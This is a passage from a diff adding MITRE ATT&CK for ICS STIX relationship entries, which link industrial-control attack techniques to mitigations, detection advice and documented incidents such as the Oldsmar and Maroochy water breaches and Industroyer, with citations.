"course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9f25cdae-7d0f-49cd-acaf-481f71195ae5", + "created": "2022-09-27T16:38:57.931Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:38:57.931Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--206cc4c8-797e-427b-86f1-4c81df391c6e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ec105f62-2552-41fa-8b07-619dc1bf9b19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.177Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c22acaab-baa4-45b0-9c4b-9330715e5455", + "created": "2022-10-13T21:18:17.775Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:26:03.133Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors utilized an operator HMI to manipulate process control setpoint values far beyond normal operating levels.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--70a9010c-6943-4274-b854-50901c3e5a0e", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:23:29.885Z", + "description": "Monitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c7a1037f-cb28-40d4-be19-78e2f0e0aa68", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:48:02.425Z", + "description": "Monitor mail server and proxy logs for evidence of messages originating from spoofed addresses, including records indicating failed DKIM+SPF validation or mismatched message headers.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7d0ec383-4c5d-474d-9262-3f3c0d6c05b1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.072Z", + "relationship_type": "mitigates", + "description": "Ensure devices have an alternative method for communicating in the event that a valid COM port is unavailable.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--df95c619-33ee-4484-934a-78857717323e", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:18:47.783Z", + "description": "Monitor for unusual logins to Internet connected devices or unexpected protocols to/from the Internet. Network traffic content will provide valuable context and details about the content of network flows.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5bf8473c-3c60-4a8a-8514-c2b50ab8a92d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.156Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea5828bb-5da7-4ed8-83b8-8d3b0e51cb3a", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:51:47.079Z", + "description": "Monitor ICS automation protocols for functions that restart or shutdown a device. Commands to restart or shutdown devices may also be observable in traditional IT management protocols.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54f6293a-1ccb-4dcb-b85c-9a2a57daddb9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:18:27.480Z", + "description": "Monitor for unexpected protocols to/from the Internet. While network traffic content and logon session metadata may directly identify a login event, new Internet-based network flows may also be a reliable indicator of this technique.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f64b5aa-7e4d-4a5e-9960-69a63ad25083", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.201Z", + "relationship_type": "mitigates", + "description": "Execution prevention may prevent malicious scripts from accessing protected resources.\n", + "source_ref": "course-of-action--4fa717d9-cabe-47c8-8cdd-86e9e2e37f30", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2c641542-2e18-4943-849a-7141b7da4fcd", + "created": "2022-09-20T20:54:36.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:25:27.955Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors raised the sodium hydroxide setpoint value from 100 part-per-million (ppm) to 11,100 ppm, far beyond normal operating levels.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--39963a04-9675-4fa4-87ea-1b34145cc569", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:44.656Z", + "description": "Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe , especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) Consider monitoring for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7dedeb73-ef90-4282-a635-cc37326773af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.083Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "external_references": [ + { + "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014", + "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--ea218d63-d9de-4f63-804a-cb039d804025", + "created": "2022-09-20T20:54:08.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-18T13:26:30.893Z", + "description": "During the [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009), the threat actors gained access to the system through remote access software, allowing for the use of the standard operator HMI interface.(Citation: Pinellas County Sheriffs Office February 2021)", + "relationship_type": "uses", + "source_ref": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e323dee4-a896-4a82-85f5-d51d311b0437", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Max Heinemeyer February 2020", + "description": "Max Heinemeyer 2020, February 21 Post-mortem of a targeted Sodinokibi ransomware attack Retrieved. 2021/04/12 ", + "url": "https://www.darktrace.com/en/blog/post-mortem-of-a-targeted-sodinokibi-ransomware-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:56.076Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) uses the SMB protocol to encrypt files located on remotely connected file shares. (Citation: Max Heinemeyer February 2020)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--42508a8e-44d5-4af1-9e66-bace5fc94734", + "created": "2022-09-27T18:49:25.089Z", + "revoked": false, + "external_references": [ + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:49:25.089Z", + "description": "Monitor for mismatches between protocols and their expected ports (e.g., non-HTTP traffic on tcp:80). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--87c8ab74-576d-4962-b641-0762d374d1e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:49:35.368Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) SIPROTEC DoS module exploits the CVE-2015-5374 vulnerability in order to render a Siemens SIPROTEC device unresponsive. While the vulnerability does not directly cause the restart or shutdown of the device, the device must be restarted manually before it can resume operations. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5ca1d677-b41f-4f1e-b86b-f5637a418829", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.182Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--66f79019-d52c-46a6-b605-c2335d1d3d20", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:25:59.238Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) has the capability to stop a service itself, or to login as a user and stop a service as that user. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5d33de22-35b0-47fa-bc63-f984522340b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.068Z", + "relationship_type": "mitigates", + "description": "Unauthorized connections can be prevented by statically defining the hosts and ports used for automation protocol connections.\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b4efcbe0-ffe3-4d9a-8dba-570e68494af1", + "created": "2023-03-10T20:10:23.377Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:10:23.377Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--43bdf580-b98f-49cf-92d5-3dac50450c86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "The encryption of firmware should be considered to prevent adversaries from identifying possible vulnerabilities within the firmware.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5a16cecc-4017-4ce8-97db-01cb66a1528e", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:41.495Z", + "description": "Monitor for API calls that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7ff12adb-bc9a-42e5-9cbf-613b200c36dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.114Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at 